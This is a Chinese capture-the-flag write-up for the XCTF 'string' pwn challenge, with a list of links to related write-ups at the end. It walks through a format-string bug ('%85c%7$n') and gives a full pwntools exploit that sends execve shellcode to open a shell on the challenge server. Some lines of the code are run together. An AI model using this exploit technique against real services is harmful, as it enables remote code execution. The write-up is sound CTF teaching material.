[攻防世界 pwn]——string

题目地址：https://adworld.xctf.org.cn/
题目：

peak小知识

mmap函数作用，mmap主要是将文件映射到一段内存去同时设置那段内存的属性可读可写或者是可执行详情请看mmap & mprotect

在checksec看到开启了canary和NX，应该和格式化字符串有关。

在IDA中看看，发现侧边栏竟然有mmap函数，这个地方应该是关键点，

找到函数位置，想要保证该函数执行，必须保证前两个函数执行完毕，并且a1 == a1[1], 跟前面找会发现a1其实就最开始的v3,而v3 = 68, v3[1] = 85。我们只要修改一个就好。

在下面我们发现了有格式化字符串的漏洞可以利用修改

下面就开始逐步书写exploit

接受v3地址

from pwn import *
p = remote('111.200.241.244',57138)
p.recvuntil("secret[0] is ")
v3_0_addr = int(p.recvuntil("\n")[:-1], 16)
log.info("v3_0_addr:" + hex(v3_0_addr))

进入sub_4000D72()

p.recvuntil("character's name be:")
p.sendline("peak")

进入sub_400A7D()并退出

p.recvuntil("east or up?:")
p.sendline("east")

进入sub_400BB9()修改*v3并退出

p.recvuntil("there(1), or leave(0)?:")
p.sendline("1")
p.recvuntil("'Give me an address'")
p.sendline(str(v3_0_addr))
p.recvuntil("you wish is:")
p.sendline("%85c%7$n")

进入sub_400CA6()输入shellcode 并执行

context(os='linux',arch='amd64')
shellcode = asm(shellcraft.sh()) p.recvuntil("USE YOU SPELL")
p.sendline(shellcode)
p.interactive()

exploit

from pwn import *
p = remote('111.200.241.244',57138)
p.recvuntil("secret[0] is ")
v3_0_addr = int(p.recvuntil("\n")[:-1], 16)
log.info("v3_0_addr:" + hex(v3_0_addr))p.recvuntil("character's name be:")
p.sendline("peak")p.recvuntil("east or up?:")
p.sendline("east")p.recvuntil("there(1), or leave(0)?:")
p.sendline("1")
p.recvuntil("'Give me an address'")
p.sendline(str(v3_0_addr))
p.recvuntil("you wish is:")
p.sendline("%85c%7$n")context(os='linux',arch='amd64')
shellcode = asm(shellcraft.sh()) p.recvuntil("USE YOU SPELL")
p.sendline(shellcode)
p.interactive()

[攻防世界 pwn]——string（内涵peak小知识）相关推荐

[Jarvis OJ - PWN]——Typo(内涵peak小知识)
[Jarvis OJ - PWN]--Typo 题目地址: https://www.jarvisoj.com/challenges 题目: 还是先check一下, 是arm架构.还是第一次遇到. pe ...
[攻防世界 pwn]——pwn1（内涵peak小知识）
[攻防世界 pwn]--pwn1 题目地址:https://adworld.xctf.org.cn/ 题目: peak小知识这道题目的关键就是泄露canary,通常我们泄露canary有两种方法,遇 ...
[攻防世界 pwn]——time_formatter（内涵peak小知识）
[攻防世界 pwn]--time_formatter 题目地址: https://adworld.xctf.org.cn/ 题目: 这是一道堆利用的题, UAFF(use After Free)漏洞. ...
[BUUCTF-pwn]——[极客大挑战 2019]Not Bad(ORW)(内涵peak小知识)
[BUUCTF-pwn]--[极客大挑战 2019]Not Bad 又是一道收获满满的题目. peak小知识 seccomp: seccomp是一种内核中的安全机制,正常情况下,程序可以使用所有的sy ...
[BUUCTF-pwn]——mrctf2020_shellcode_revenge(可见字符shellcode)(内涵peak小知识)
[BUUCTF-pwn]--mrctf2020_shellcode_revenge(可见字符shellcode) 检查了下保护发现NX 没有开,肯定要自己写shellcode呀. 不过这道题,刷新了我 ...
[BUUCTF-pwn]——picoctf_2018_leak_me（内涵peak小知识）
[BUUCTF-pwn]--picoctf_2018_leak_me 题目没什么难度,但是可能反汇编的时候你们可能会出现一些问题. peak小知识 pwn题,有时会碰到无法反汇编的情况,大多数情况下, ...
[BUUCTF-pwn]——ciscn_2019_es_2(内涵peak小知识)
[BUUCTF-pwn]--ciscn_2019_es_2 题目地址: https://buuoj.cn/challenges#ciscn_2019_es_2 这是一道栈劫持的题,第一次写这种题的题解 ...
攻防世界 pwn string
攻防世界string应该是新手区数一数二的难题,难点在理解程序流程. 先观察主函数: alarm函数什么是alarm函数? 如上图所示,在做一些pwn题的时候,我们有时会遇到alarm(0x3Cu) ...
[攻防世界 pwn]——pwn-200
[攻防世界 pwn]--pwn-200 题目地址: https://adworld.xctf.org.cn/ 题目: peak小知识 ret2libc的题型, 一般给一个输出和一个输入的函数, 输入一 ...

[攻防世界 pwn]——string（内涵peak小知识）

[攻防世界 pwn]——string

peak小知识

exploit

[攻防世界 pwn]——string（内涵peak小知识）相关推荐

最新文章

热门文章